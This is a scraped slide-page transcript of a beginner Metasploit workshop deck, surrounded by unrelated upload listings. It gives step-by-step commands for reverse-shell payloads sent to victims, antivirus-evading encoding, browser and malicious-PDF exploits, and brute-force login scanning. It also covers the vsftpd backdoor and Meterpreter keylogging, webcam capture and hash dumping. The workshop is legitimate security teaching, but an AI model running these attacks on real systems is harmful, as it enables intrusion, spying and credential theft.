BRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptx
BRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptxBRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptx
BRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptx
kambal1234567890
 
H. A. Roberts: VITAL FORCE - Dr. Niranjan Bapat
H. A. Roberts: VITAL FORCE - Dr. Niranjan BapatH. A. Roberts: VITAL FORCE - Dr. Niranjan Bapat
H. A. Roberts: VITAL FORCE - Dr. Niranjan Bapat
Niranjan Bapat
 
NC Public Schools Involved in NCDPI, Zipline Partnership
NC Public Schools Involved in NCDPI, Zipline PartnershipNC Public Schools Involved in NCDPI, Zipline Partnership
NC Public Schools Involved in NCDPI, Zipline Partnership
Mebane Rash
 
How to Manage Shipping Connectors & Shipping Methods in Odoo 17
How to Manage Shipping Connectors & Shipping Methods in Odoo 17How to Manage Shipping Connectors & Shipping Methods in Odoo 17
How to Manage Shipping Connectors & Shipping Methods in Odoo 17
Celine George
 
How to Manage Line Discount in Odoo 17 POS
How to Manage Line Discount in Odoo 17 POSHow to Manage Line Discount in Odoo 17 POS
How to Manage Line Discount in Odoo 17 POS
Celine George
 
Edukasyong Pantahanan at Pangkabuhayan 1: Personal Hygiene
Edukasyong Pantahanan at  Pangkabuhayan 1: Personal HygieneEdukasyong Pantahanan at  Pangkabuhayan 1: Personal Hygiene
Edukasyong Pantahanan at Pangkabuhayan 1: Personal Hygiene
MJDuyan
 
1-NLC-MATH7-Consolidation-Lesson1 2024.pptx
1-NLC-MATH7-Consolidation-Lesson1 2024.pptx1-NLC-MATH7-Consolidation-Lesson1 2024.pptx
1-NLC-MATH7-Consolidation-Lesson1 2024.pptx
AnneMarieJacildo
 
Webinar Innovative assessments for SOcial Emotional Skills
Webinar Innovative assessments for SOcial Emotional SkillsWebinar Innovative assessments for SOcial Emotional Skills
Webinar Innovative assessments for SOcial Emotional Skills
EduSkills OECD
 
NAEYC Code of Ethical Conduct Resource Book
NAEYC Code of Ethical Conduct Resource BookNAEYC Code of Ethical Conduct Resource Book
NAEYC Code of Ethical Conduct Resource Book
lakitawilson
 
How to Add a Filter in the Odoo 17 - Odoo 17 Slides
How to Add a Filter in the Odoo 17 - Odoo 17 SlidesHow to Add a Filter in the Odoo 17 - Odoo 17 Slides
How to Add a Filter in the Odoo 17 - Odoo 17 Slides
Celine George
 
"DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ...
"DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ..."DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ...
"DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ...
thanhluan21
 
Odoo 17 Social Marketing - Lead Generation On Facebook
Odoo 17 Social Marketing - Lead Generation On FacebookOdoo 17 Social Marketing - Lead Generation On Facebook
Odoo 17 Social Marketing - Lead Generation On Facebook
Celine George
 
2024 KWL Back 2 School Summer Conference
2024 KWL Back 2 School Summer Conference2024 KWL Back 2 School Summer Conference
2024 KWL Back 2 School Summer Conference
KlettWorldLanguages
 

Recently uploaded (20)

The Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdf
The Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdfThe Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdf
The Jewish Trinity : Sabbath,Shekinah and Sanctuary 4.pdf
 
The Cruelty of Animal Testing in the Industry.pdf
The Cruelty of Animal Testing in the Industry.pdfThe Cruelty of Animal Testing in the Industry.pdf
The Cruelty of Animal Testing in the Industry.pdf
 
How to Create a New Article in Knowledge App in Odoo 17
How to Create a New Article in Knowledge App in Odoo 17How to Create a New Article in Knowledge App in Odoo 17
How to Create a New Article in Knowledge App in Odoo 17
 
How to Empty a One2Many Field in Odoo 17
How to Empty a One2Many Field in Odoo 17How to Empty a One2Many Field in Odoo 17
How to Empty a One2Many Field in Odoo 17
 
matatag curriculum education for Kindergarten
matatag curriculum education for Kindergartenmatatag curriculum education for Kindergarten
matatag curriculum education for Kindergarten
 
How To Update One2many Field From OnChange of Field in Odoo 17
How To Update One2many Field From OnChange of Field in Odoo 17How To Update One2many Field From OnChange of Field in Odoo 17
How To Update One2many Field From OnChange of Field in Odoo 17
 
DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...
DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...
DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY N...
 
BRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptx
BRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptxBRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptx
BRIGADA ESKWELA OPENING PROGRAM KICK OFF.pptx
 
H. A. Roberts: VITAL FORCE - Dr. Niranjan Bapat
H. A. Roberts: VITAL FORCE - Dr. Niranjan BapatH. A. Roberts: VITAL FORCE - Dr. Niranjan Bapat
H. A. Roberts: VITAL FORCE - Dr. Niranjan Bapat
 
NC Public Schools Involved in NCDPI, Zipline Partnership
NC Public Schools Involved in NCDPI, Zipline PartnershipNC Public Schools Involved in NCDPI, Zipline Partnership
NC Public Schools Involved in NCDPI, Zipline Partnership
 
How to Manage Shipping Connectors & Shipping Methods in Odoo 17
How to Manage Shipping Connectors & Shipping Methods in Odoo 17How to Manage Shipping Connectors & Shipping Methods in Odoo 17
How to Manage Shipping Connectors & Shipping Methods in Odoo 17
 
How to Manage Line Discount in Odoo 17 POS
How to Manage Line Discount in Odoo 17 POSHow to Manage Line Discount in Odoo 17 POS
How to Manage Line Discount in Odoo 17 POS
 
Edukasyong Pantahanan at Pangkabuhayan 1: Personal Hygiene
Edukasyong Pantahanan at  Pangkabuhayan 1: Personal HygieneEdukasyong Pantahanan at  Pangkabuhayan 1: Personal Hygiene
Edukasyong Pantahanan at Pangkabuhayan 1: Personal Hygiene
 
1-NLC-MATH7-Consolidation-Lesson1 2024.pptx
1-NLC-MATH7-Consolidation-Lesson1 2024.pptx1-NLC-MATH7-Consolidation-Lesson1 2024.pptx
1-NLC-MATH7-Consolidation-Lesson1 2024.pptx
 
Webinar Innovative assessments for SOcial Emotional Skills
Webinar Innovative assessments for SOcial Emotional SkillsWebinar Innovative assessments for SOcial Emotional Skills
Webinar Innovative assessments for SOcial Emotional Skills
 
NAEYC Code of Ethical Conduct Resource Book
NAEYC Code of Ethical Conduct Resource BookNAEYC Code of Ethical Conduct Resource Book
NAEYC Code of Ethical Conduct Resource Book
 
How to Add a Filter in the Odoo 17 - Odoo 17 Slides
How to Add a Filter in the Odoo 17 - Odoo 17 SlidesHow to Add a Filter in the Odoo 17 - Odoo 17 Slides
How to Add a Filter in the Odoo 17 - Odoo 17 Slides
 
"DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ...
"DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ..."DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ...
"DANH SÁCH THÍ SINH XÉT TUYỂN SỚM ĐỦ ĐIỀU KIỆN TRÚNG TUYỂN ĐẠI HỌC CHÍNH QUY ...
 
Odoo 17 Social Marketing - Lead Generation On Facebook
Odoo 17 Social Marketing - Lead Generation On FacebookOdoo 17 Social Marketing - Lead Generation On Facebook
Odoo 17 Social Marketing - Lead Generation On Facebook
 
2024 KWL Back 2 School Summer Conference
2024 KWL Back 2 School Summer Conference2024 KWL Back 2 School Summer Conference
2024 KWL Back 2 School Summer Conference
 

Metasploit Humla for Beginner

  • 1. By : Ajay Srivastava
  • 2. Please don’t expect ….  How to evade antiviruses (antivirus evasion)  How to do pivoting  How to do port forwarding  How to write your own metasploit module
  • 3. Disclaimer All the information or technique you will be learning here is for educational purpose and should not be used for malicious activities.
  • 4. Agenda  Introduction  Basics of Metasploit  Information gathering  Exploitation  ( 11:30-11:45 - Break 1/ Tea )*  Meterpreter Basics  Post exploitation using meterpreter  Meterpeter scripts  ( 1:00 – 2:00 - Break 2 / Lunch )*
  • 5. Agenda  Metasploit utilities  Client-side exploitation  ( 4:00-4:20 – Break 3 / Tea )*  Auxiliary module  And we are done   * Lunch and Tea are self sponsored.
  • 6. Introduction  It’s not a Tool, it’s a Framework !!!
  • 7. History  Developed by H.D Moore in 2003  Originally written in Perl & later on rewritten in Ruby  Acquired by Rapid7 in 2009  Remains open source & free for use
  • 9. Libraries  Rex :  The basic library for most tasks  Handles sockets and protocols  MSF CORE :  Defines the Metasploit Framework  Provides the ‘basic’ API  MSF BASE :  Provides the ‘friendly’ API  Provides simplified APIs for use in the Framework
  • 10. Modules  Exploit  Modules used for actually attacking the systems and grabbing the access.  Payload  Piece of code which executes on remote system after successful exploitation.  Auxiliary  Exploit without payload. Used for scanning, fuzzing & doing various tasks.
  • 11. Modules  Encoders  Program which encodes our payload to avoid antivirus detection  Nops  Used to keep payload size consistent
  • 12. Payloads  Single  Completely standalone  eg: Add user  Stagers  Creates the network connection  Stages  Downloaded by the stagers  eg: Meterpreter
  • 13. Payloads  Payload is staged if represented by ‘/’ in the payload name  Windows/shell_bind_tcp  single payload with no stage  Windows/shell/bind_tcp  a stager (bind_tcp)  a stage (shell)
  • 15. MSFCONSOLE  Most powerful interface among all interfaces
  • 18. Armitage  Graphical version of Metasploit  Developed by Raphel Mudge  Supports both GUI & CLI
  • 20. Basics Commands  #msfconsole  #msfupdate  MSFConsole commands are classified in two types :  Core Commands  Database commands
  • 21. Core Commands  help or ?  banner  version  show  search  msf>search <module name>  info  msf>info <module name>  use  msf>use <exploit/auxiliary name>
  • 22. Core Commands  back  show options  set  msf>set <option> <value>  setg  msf>set <option> <value>  unset  msf>set <option> <value>  unsetg  msf>set <option> <value>
  • 23. Core Commands  show payloads  set payload  msf>set payload <payload name>  check  exploit  run
  • 24. Database Commands  Default database : PostgreSQL  Database.yml  /opt/metasploit/apps/pro/ui/config/database.yml  # cat database.yml  db_status  db_disconnect
  • 26. Database Commands  db_nmap  # db_nmap –sV –A –O <ip range>  hosts  # hosts –h  services  # services
  • 27. Database Commands  vulns  db_export  db_import  db_rebuild_cache  creds  db_load  db_unload
  • 28. Information Gathering  Auxiliary modules are the best !!!  Will cover in detail later  Using auxiliary/scanner/portscan/tcp  # msf>auxiliary/scanner/portscan/tcp Or  nmap <switches> <ip address>
  • 29. Exploitation  To list available exploits :  msf> search <exploit name>  To select an exploit :  msf> use <exploit name>  To get information about selected exploits  msf/exploitname> info  To check the options and set arguments  msf/exploitname> show options  To set the target host  msf/exploitname> set rhost <victim ip>
  • 30. Exploitation  To list supported payload with selected exploit  msf/exploitname> show payloads  To set the payload  msf/exploitname> set payload <payload name>  To set attacker machine  msf/exploitname> Set lhost <own ip>  To check if target is vuln to selected exploit  msf/exploitname> Check  To launch the attack  msf/exploitname> exploit
  • 32. Meterpreter  Post exploitation module  Runs in the exploited process context  Runs in memory and doesn’t create any file on disk  Encrypted communication  Stable and extensible
  • 33. Meterpreter  Classification  Core commands  File system commands  System commands  User interface commands  Priv commands  Networking commands
  • 34. Meterpreter : Core commands  background  sessions  ps  migrate  bgrun/bglist/bgkill  resource
  • 35. Meterpreter : Core commands  Run  #msf>run <script name>  Channel  #msf>execute –f <program> -c  Use  #msf>use <extension name>
  • 36. Meterpreter:File System Commands  pwd  cd  getlwd/getlcd  ls  cat/edit  download/upload
  • 37. Meterpreter:File System Commands  search  #msf>search –d <directory> -f *.<fileformat> -r  mkdir/rmdir  rm/rmdir  del
  • 38. Meterpreter : System Commands  sysinfo  getpid/getuid  shell  reboot  shutdown  ps
  • 39. Meterpreter : UI Commands  User interface & Webcam commands  idletime  keyscan_start  keyscan_dump  keyscan_stop  webcam_list  webcam_snap
  • 40. Meterpreter : Privs Commands  getsystem  hashdump  timestomp  timestomp –h  timestomp <filepath> -v { to display all atributes}  timestomp <filepath> -c <MM/DD/YYYY H:M:S>
  • 41. Meterpreter: Networking commands  arp  ipconfig/ifconfig  netstat  route  portfwd
  • 42. Meterpreter scripts  Path :  /usr/share/metasploit-framework/scripts/meterpreter  Or  meterpreter>run <tab multiple times>
  • 43. Meterpreter scripts run <script name>  run checkvm  run credcollect  run keylogrecorder  run winenum  run getcountermeasure  run getgui
  • 44. Meterpreter scripts  run scraper  run hostedit  run gettelnet  run arpscanner  run vnc  run filecollector  #msf>run filecollector –d <dnm> -f *.txt -r
  • 46. Metasploit Utilities  Three main utilities to generate shellcode and to evade antiviruses  Msfpayload  Msfencode  Msfvenom
  • 47. Msfpayload  To generate payload in different formats as exe ,C , Ruby and javascript  Using msfpayload :  root@kali:~# msfpayload -h  To check options  root@kali:~# msfpayload <payload name> O  root@:~# msfpayload windows/meterpreter/reverse_tcp O  Setting the options  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe  Sending this exploit.exe to victim
  • 48. Using Mutli-handler Exploit / setting listener  Setup listner:  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  msf exploit(handler) > show options  msf exploit(handler) > set lhost <attacker ip>  msf exploit(handler) > set lport 4422  msf exploit(handler) > exploit
  • 49. MSFEncode  To bypass antiviruses  Alters code , by converting into binary EXE. While interacting back , it will decode and execute the same into memory.  Payload is encoded by different encoders
  • 50. MSFEncode  root@kali:~# msfencode -h  Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>  OPTIONS:  -e <opt> The encoder to use  -c <opt> The number of times to encode the data  -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe  -x <opt> Specify an alternate executable template  -k Keep template working; run payload in new thread (use with -x)
  • 51. MSFEncode  list encoders:  root@kali:~# msfencode –l  msfencode with msfpayload:  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
  • 52. Client-side Attacks  Difficult to find server-side vulnerabilities  Most enterprises have incoming connections locked down with firewalls  Client-side attacks are the most common ones: - Browser based attacks - Social engineering attacks using malicious link or file
  • 53. Client-side Attacks:Browser based  Using IE 6 based Aurora exploit  msf > search aurora  msf > use exploit/windows/browser/ms10_002_aurora  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set srvhost <attacker ip>  msf exploit(ms10_002_aurora) > set srvport 80  msf exploit(ms10_002_aurora) > set uripath /test
  • 54. Client-side Attacks:Browser based  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set lhost <own ip>  msf exploit(ms10_002_aurora) > set lport 443  msf exploit(ms10_002_aurora) > exploit
  • 55. Client-side Attacks:File Format  Nowadays file format based exploits are exploiting targets in wild.  File formats such as pdf , doc or rtf are sent as attachment to the victim and expected to open it.  For eg:  Adobe util.printf() Bufferoverflow vulnerability  MS14-017 Microsoft Word RTF Object Confusion
  • 56. Client-side Attacks:File Format  Exploiting Adobe util.printf() Bufferoverflow vulnerability  msf > search adobe_utilprintf  msf > use exploit/windows/fileformat/adobe_utilprintf  msf exploit(adobe_utilprintf) > set filename resume.pdf  msf exploit(adobe_utilprintf) > show options  msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
  • 57. Client-side Attacks:File Format  msf exploit(adobe_utilprintf) > setg lhost <attacker ip>  msf exploit(adobe_utilprintf) > set lport 443  msf exploit(adobe_utilprintf) > exploit  Setup listener(i.e multi/handler)  Send this resume.pdf using some social engineering techniques.
  • 58. Client-side Attacks:File Format  Setting up listener on local machine :  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > show options  msf exploit(handler) > set lhost <own ip>  msf exploit(handler) > set lport 443  msf exploit(handler) > exploit
  • 60. Auxiliary Modules  Pre-exploitation module  Port scanners, fuzzers, banner grabbers, brute-force module etc.  Path:  /usr/share/metasploit-framework/modules/auxiliary or  Using show auxiliary on msfconsole :  msf > show auxiliary  Used without payloads
  • 61. Auxiliary Modules  Used same as exploits but without payload  msf> use <auxiliary name>  ‘run’ command instead of ‘exploit’ command  RHOSTS instead of RHOST
  • 62. Auxiliary Modules : Port scanners  Portscanner auxiliary module used for port scanning  Using portscanners :  msf > search portscan  msf > use auxiliary/scanner/portscan/tcp  msf auxiliary(tcp) > show options  msf auxiliary(tcp) > set rhosts <target>  msf auxiliary(tcp) > set ports 1-100  msf auxiliary(tcp) > set threads 10  msf auxiliary(tcp) > run
  • 63. Auxiliary Modules : SMB version fingerprinting  msf > search smb_version  msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > show options  msf auxiliary(smb_version) > set rhosts 192.168.37.0/24  msf auxiliary(smb_version) > set threads 10  msf auxiliary(smb_version) > run
  • 64. Auxiliary Modules : Version Scanner  Banner grabbing of MySQL server :  msf > search MySQL  msf > use auxiliary/scanner/mysql/mysql_version  msf auxiliary(mysql_version) > show options  msf auxiliary(mysql_version) >set rhosts <target>  msf auxiliary(mysql_version) > run
  • 65. Auxiliary Modules: Login Scanners  Testing login attack on MySQL :  msf > use auxiliary/scanner/mysql/mysql_login  msf auxiliary(mysql_login) > show options  msf auxiliary(mysql_login) > setg rhosts <target>  msf auxiliary(mysql_login) > set user_file userfile.txt
  • 66. Auxiliary Modules: Login Scanners  msf auxiliary(mysql_login) > set pass_file passfile.txt  msf auxiliary(mysql_login) > set stop_on_success true  msf auxiliary(mysql_login) > run
  • 67. Auxiliary Modules : Telnet  msf > search telnet_login  msf > use auxiliary/scanner/telnet/telnet_login  msf auxiliary(telnet_login) > show options  msf auxiliary(telnet_login)) > setg rhosts <target ip>  msf auxiliary(telnet_login) > set user_file userfile.txt
  • 68. Auxiliary Modules : Telnet  msf auxiliary(telnet_login) > set pass_file passfile.txt  msf auxiliary(telnet_login) > set stop_on_success true  msf auxiliary(telnet_login) > run  Verify:  root@kali:~# telnet <target ip>
  • 69. Auxiliary Modules : Attacking FTP  msf > search ftp_version  msf > use auxiliary/scanner/ftp/ftp_version  msf auxiliary(ftp_version) > show options  msf auxiliary(ftp_version) > set rhosts <target>  msf auxiliary(ftp_version) > run  Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)
  • 70. Auxiliary Modules : Attacking FTP  Now checking for ftp login  msf > search ftp_login  msf > use auxiliary/scanner/ftp/ftp_login  msf auxiliary(ftp_login) > set rhosts <target ip>  msf auxiliary(ftp_login) > set user_file userfile.txt  msf auxiliary(ftp_login) > set pass_file passfile.txt  msf auxiliary(ftp_login) > set stop_on_success true  msf auxiliary(ftp_login) > run  Successful FTP login for 'msfadmin':'msfadmin'
  • 71. Auxiliary Modules : Attacking FTP  From FTP version scan we know its version is vsFTPd 2.3.4  Now looking for exploit of this FTP version  msf > search vsFTPd 2.3.4  msf > use exploit/unix/ftp/vsftpd_234_backdoor  msf exploit(vsftpd_234_backdoor) > show options  msf exploit(vsftpd_234_backdoor) > set rhost <target ip>  msf exploit(vsftpd_234_backdoor) > show payloads  msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact  msf exploit(vsftpd_234_backdoor) > exploit
  • 73. References  Metasploit Guide, http://packetstormsecurity.com/files/119280,  Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)  Metasploit Unleashed ,  http://www.offensive-security.com/metasploit- unleashed/Main_Page